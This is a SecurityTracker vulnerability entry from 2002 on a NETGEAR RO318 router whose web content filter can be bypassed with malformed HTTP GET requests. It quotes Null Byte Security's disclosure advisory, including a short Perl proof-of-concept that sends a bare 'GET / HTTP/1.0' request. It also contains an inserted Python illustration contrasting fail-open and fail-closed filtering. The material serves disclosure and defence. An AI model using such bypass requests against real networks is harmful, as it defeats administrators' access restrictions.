SecurityTracker.com
Category:   Device (Router/Bridge/Hub)  >   NETGEAR Router
Vendors:   NETGEAR
NETGEAR Router Web Content Filtering Mechanism Can Be Bypassed By Remote Users With Certain Malformed HTTP GET Requests
SecurityTracker Alert ID:  1003411
SecurityTracker URL:  http://securitytracker.com/id/1003411
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 31 2002
Impact:   Host/resource access via network
Exploit Included:  Yes  
Version(s): RO318
Description:   A vulnerability was reported in NETGEAR's RO318 Cable/DSL Security Router. A remote user can bypass the web content filtering restrictions.

It is reported that a remote user can send a malformed URL request through the router to access restricted web site URLs. The web filtering component in firmware reportedly only checks for fully constructed requests.

Impact:   A remote user can access restricted web content.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.netgear.com/product_view.asp?xrp=4&yrp=12&zrp=96
Cause:   Input validation error

Message History:   None.
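
An added illustration of the failure mode described above (not code from the advisory or from NETGEAR firmware): a keyword filter that inspects only strictly well-formed requests and forwards everything else, beside a variant that parses leniently and fails closed. The request grammar, the policy keyword and the sample requests are constructed assumptions; the firmware's actual parsing logic is not documented in this entry.

```python
import re

# Constructed policy keyword standing in for an administrator's blocked
# "Web address keyword" (assumption, not from the advisory).
BLOCKED_KEYWORDS = (b"blocked-example",)

# Strict grammar: request line and every header end in CRLF, then a blank CRLF.
STRICT_REQUEST = re.compile(
    rb"\A[A-Z]+ (\S+) HTTP/1\.[01]\r\n((?:[^\r\n]+\r\n)*)\r\n")
# Tolerant grammar: request line only; CR and HTTP version are optional.
LOOSE_REQUEST_LINE = re.compile(rb"\A[A-Z]+ +(\S+)(?: +HTTP/\d\.\d)?\r?\n")

# Constructed sample requests.
WELL_FORMED = b"GET / HTTP/1.0\r\nHost: blocked-example.test\r\n\r\n"
BARE_LF = b"GET /blocked-example/index.html HTTP/1.0\n\n"
ALLOWED = b"GET /index.html HTTP/1.0\r\nHost: allowed.test\r\n\r\n"
GARBAGE = b"\x00\x01 not http"


def _hits_policy(*fields: bytes) -> bool:
    """True if any blocked keyword appears in any inspected field."""
    return any(k in f.lower() for f in fields for k in BLOCKED_KEYWORDS)


def fail_open_filter(raw: bytes) -> str:
    """Assumed model of the flaw: only strictly well-formed requests are inspected."""
    m = STRICT_REQUEST.match(raw)
    if m is None:
        return "forward"  # unparsed request skips the policy check entirely
    return "block" if _hits_policy(m.group(1), m.group(2)) else "forward"


def fail_closed_filter(raw: bytes) -> str:
    """Hardened variant: parse leniently, inspect all of it, drop the unparseable."""
    m = LOOSE_REQUEST_LINE.match(raw)
    if m is None:
        return "block"  # not recognisable as a request line: do not forward
    rest = raw[m.end():].replace(b"\r\n", b"\n")
    headers = rest.split(b"\n\n", 1)[0]  # header block, whatever the line endings
    return "block" if _hits_policy(m.group(1), headers) else "forward"


if __name__ == "__main__":
    for name, req in [("well-formed", WELL_FORMED), ("bare LF", BARE_LF),
                      ("allowed", ALLOWED), ("garbage", GARBAGE)]:
        print(f"{name:12} fail-open={fail_open_filter(req):8}"
              f" fail-closed={fail_closed_filter(req)}")
```
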


 Source Message Contents

Subject:  NetGear RO318 HTTP Filter Advisory


http://home.tampabay.rr.com/nbs/advisories/netgear/netgear.txt
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ NetGear RO318 HTTP Filter Advisory                                             =+
=+ Null Byte Security                                                             =+
=+ http://home.tampabay.rr.com/nbs/                                               =+
=+ don't call it a come back                                                      =+
=+ nbs@tampabay.rr.com                                                            =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ Contents Table                                                                 =+
=+                                                                                =+
=+ 1.About                                                                        =+
=+ 2.Affected                                                                     =+
=+ 3.Details                                                                      =+
=+ 4.Contact                                                                      =+
=+ 5.Conclusion                                                                   =+
=+ 6.Thanks                                                                       =+
=+ 7.Greets                                                                       =+
=+ 8.POC                                                                          =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 1.About                                                                        =+
=+                                                                                =+
=+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch      =+
=+ fully protects your small office network against intrusion. Equipped with      =+
=+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and     =+
=+ Network Address Translation (NAT) to maintain network security against         =+
=+ hackers, it ensures prolonged up time and maximized productivity for your      =+
=+ network. Web content filtering options let network administrators establish    =+
=+ restricted access policies - based on the time of day, day of week, Web        =+
=+ address keyword - and receive regular reports and instant alerts via e-mail on =+
=+ hacker attempts and browsing activities. Web-based installation instructions   =+
=+ make setup easy. Your network up and running, and sharing high-speed Internet  =+
=+ access with up to 253 users, in less than an hour.                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 2.Affected                                                                     =+
=+                                                                                =+
=+ NetGear RO318 Cable/DSL Security Router                                        =+
=+                                                                                =+
=+ Although the NetGear RO318 is the only router listed here we are sure there    =+
=+ are other routers that use the RO318's web filtering technology.               =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 3.Details                                                                      =+
=+                                                                                =+
=+ We are not too sure of the details ourselves because of time restraints, but   =+
=+ we do have an idea. One, the web filtering component in the firmware only      =+
=+ checks for fully constructed requests and thus sending a malformed, somewhat,  =+
=+ request results in the retrieval of restricted content.                        =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 4.Contact                                                                      =+
=+                                                                                =+
=+ December 2 2001: Contacted NetGear                                             =+
=+ December 2 2001: Contacted online support                                      =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460001)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460003)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460006)       =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460008)       =+
=+ December 8 2001: Five working days passed                                      =+
=+ December 20 2001: Eighteen days passed                                         =+
=+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/               =+
=+ December 26 2001: POC released                                                 =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 5.Conclusion                                                                   =+
=+                                                                                =+
=+ This is definitely a security vulnerability and not a feature. We hope Net     =+
=+ Gear will fix this with their next firmware release so administrators can      =+
=+ restrict necessary web-content without having to worry about this bug.         =+
=+                                                                                =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 6.Thanks                                                                       =+
=+                                                                                =+
=+ Bi0cide for the help                                                           =+
=+ Datagram for the help                                                          =+
=+ Natas for the help                                                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 7.Greets                                                                       =+
=+                                                                                =+
=+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11,     =+
=+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com), RFP,   =+
=+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm, =+
=+ Security Focus, and everyone else.                                             =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 8.POC                                                                          =+
=+                                                                                =+
#!/usr/bin/perl
#don't call it a come back
#nbs@tampabay.rr.com

use IO::Socket;
use Getopt::Std;

getopts('h:p:z', \%argv);

if(!defined($argv{h}))
{
    print"NetGear RO318 Web Filter Bypass Exploit by Null Byte Security   \n";

    print"Usage: $0 -h <host> -p <port>                                   \n";
    exit;
}

if(defined($argv{h}))
{
    &begin
}

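sub begin
{
    # Output file for the response (the original used the bareword html)
    $html   = "html";
    $host   = $argv{h};
    # Default to port 80 when -p is not given
    if(defined $argv{p})
    {
        $port=$argv{p};
    }
    else
    {
        $port = "80";
    }

    $socket = IO::Socket::INET->new (Proto => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => "$port")
                                  or die "Connection Refused.\n";

    # Open the log once, in append mode, instead of on every line read
    open(LOG, ">>$html") or die "Cannot open $html: $!\n";

    # Request string exactly as the original PoC sends it
    print $socket "GET / HTTP/1.0\n\n";
    while (<$socket>)
    {
        print LOG $_;
    }
    close LOG;
    close $socket;
}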
=+                                                                                =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ http://www.wiretrip.net/rfp/policy.html                                        =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
